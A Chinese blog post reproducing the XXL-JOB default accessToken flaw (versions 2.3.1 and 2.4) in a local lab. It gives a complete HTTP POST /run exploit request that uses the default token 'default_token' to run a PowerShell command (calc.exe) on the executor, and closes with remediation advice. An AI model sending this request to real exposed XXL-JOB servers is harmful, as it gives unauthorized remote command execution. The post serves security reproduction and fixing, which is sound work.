首页 > 其他分享 >xxl-job默认accessToken命令执行漏洞复现

xxl-job默认accessToken命令执行漏洞复现

时间:2023-11-02 13:11:47浏览次数:39  
标签:accessToken E5% 样例 job 复现 xxl

起因:

昨天看见微步发布XXL-JOB默认accessToken身份绕过漏洞,之前hw期间遇到过几次,都没弱口令和未授权,对其有点印象,遂复现一下。

漏洞影响:2.3.1和2.4

 环境准备:

1、下载即可:https://github.com/xuxueli/xxl-job/releases/tag/2.4.0

  将其导入IDEA中,即可进行分析。环境要求:Maven3+、Jdk1.8+、Mysql5.7+

ps:关于IDEA和maven配置网上文章很多,不过多赘述。

2、mysql数据库创建xxl_job数据库,解压下载的文件将doc/db/下的tables_xxl_job.sql打开运行里面的sql脚本。

3、配置对应的数据库账号密码

 4、然后运行就可以了,需要用到8080、8081可以自己在application.properties里面的server.port修改

 

漏洞分析复现:

 通过微步的漏洞通报说是

然后就看回到项目中看这个applictation.properties文件,*.properties是spring项目中配置文件的后缀,配置信息基本都在这个.peoperties文件中。文件位于src/main/resources/application.properties

 参照官方文档中的:https://www.xuxueli.com/xxl-job/#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E8%B0%83%E5%BA%A6%E4%B8%AD%E5%BF%83%E9%85%8D%E7%BD%AE%EF%BC%9A

 默认情况下是非空的,也就是xxl.job.accessToken=default_token,所以就是利用点在这里。不知道作者这么会给了个默认值,翻看之前的版本accessToken都为空,直到2.3.1后才出现默认值。

关于accessToken官方文档也给出了样例:https://www.xuxueli.com/xxl-job/#%E5%85%AD%E3%80%81%E8%B0%83%E5%BA%A6%E4%B8%AD%E5%BF%83/%E6%89%A7%E8%A1%8C%E5%99%A8%20RESTful%20API

跟着样例即可复现成功,需要注意的是这里脚本的选择,由于我是win下运行的所以使用到了powershell。

ps:跟着样例,跟着样例,跟着样例

POST /run HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
XXL-JOB-ACCESS-TOKEN: default_token
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "SERIAL_EXECUTION",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_POWERSHELL",
  "glueSource": "calc.exe",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

修复:

把accessToken置空就好啦,使用accessToken时设置强accessToken或随机accessToken

 

标签:accessToken,E5%,样例,job,复现,xxl
From: https://www.cnblogs.com/chm0d/p/17805168.html

相关文章

  • XXL-SSO框架基础入门
    XXL-SSO介绍XXL-SSO是一个开源的分布式单点登录框架。只需要登录一次就可以访问所有相互信任的应用系统。拥有"轻量级、分布式、跨域、Cookie+Token均支持、Web+APP均支持"等特性,可以开箱即用。特性1、简洁:API直观简洁,可快速上手;2、轻量级:环境依赖小,部署与接入成本较低;3、单点登录......
  • odoo pdf 打印任务后台运行,pdf保存在附件中, 借助queue_job模块实现后台打印
    用户故事:在打印大批量pdf文件时会有较长事件的等待,而且容易中断原因中断原因,有内存及超时限制,wkhtmltopdf工具比较吃内存解决方案:内存限制的问题可以分批处理,比如每次只处理50条记录代码示例,使用按钮触发的打印功能:#model:[email protected]......
  • 在CentOS7上更改端口号时报错:Job for sshd.service failed because the control proce
    1、问题描述在在CentOS7×上更改端口号时报错:“Jobforsshd.servicefailedbecausethecontrolprocessexitedwitherrorcode.See‘systemclstatus&sshdservice"andfournalctixe'fordetails.”2、修改ssh端口号的方法sudovim/etclssh/sshd_config将“#Port......
  • Springboot整合XXL-job
    1、开发步骤:pom.xml<!--xxl-job--><dependency><groupId>com.xuxueli</groupId><artifactId>xxl-job-core</artifactId><version>2.3.1</version></dep......
  • XXL-job
    一、简介:中文文档:https://www.xuxueli.com/xxl-job/ 二、安装与部署:Windows部署/安装:1、下载地址:https://github.com/xuxueli/xxl-job2、使用IDEA拉取项目到本地3、初始化数据库,数据库名称xxl_job,使用项目中doc-->db-->table_xxl_job.sql......
  • Kotlin 协程Job 代替 Handler执行延时任务 带取消
    privatevalhandler=Handler(Looper.getMainLooper())varrunnable=Runnable{dismissProgressDialog()}......handler.postDelayed(runnable,(10*1000).toLong())......//取消任务handler.removeCallbacks(runnable)privatevarjob:Job?=null......job......
  • docker安装xxl-job
    docker安装xxl-job拉取xxl-job-admin项目MySQL初始化脚本,查看创建xxl-job数据库拉取镜像dockerpullxuxueli/xxl-job-admin:2.4.0创建目录mkdir/tool/xxl-job/logs官方配置信息下载放置xxl-job目录下创建容器dockerrun-d\-p8080:8080\-v/to......
  • 分布式定时任务-利用分布式定时任务框架xxl-job实现任务动态发布
     1.场景:项目前期使用k8s部署的单节点,后期生产需要将单节点的服务扩展多个节点,每个节点的定时任务使用的quartz实现,如果不加限制且定时任务有对数据库的写操作,在不同节点上执行的定时任务容易造成数据库产生脏数据,所以需要分布式任务框架对任务进行控制,这里我们使用xxl-job实现。......
  • Jenkins job 迁移
     插件下载搜索: JobImportPlugin  点击安装 配置迁原服务地址系统管理->系统配置  :找到JobImportPlugin配置 Name:自定义Url:原jenkins服务地址可以在系统管理->系统配置->JenkinsLocation下面找到凭证:登录原jenkins的管理账户用户名密码 选......
  • 启动vsftpd进程时报错Job for vsftpd.service failed
    问题描述:启动vsftpd进程时报错Jobforvsftpd.servicefailed,如下所示:系统:rhel7.31、异常重现[root@leo-827mgr-masterlocal]#systemctlstartvsftpdJobforvsftpd.servicefailedbecausethecontrolprocessexitedwitherrorcode.See"systemctlstatusvsftpd.ser......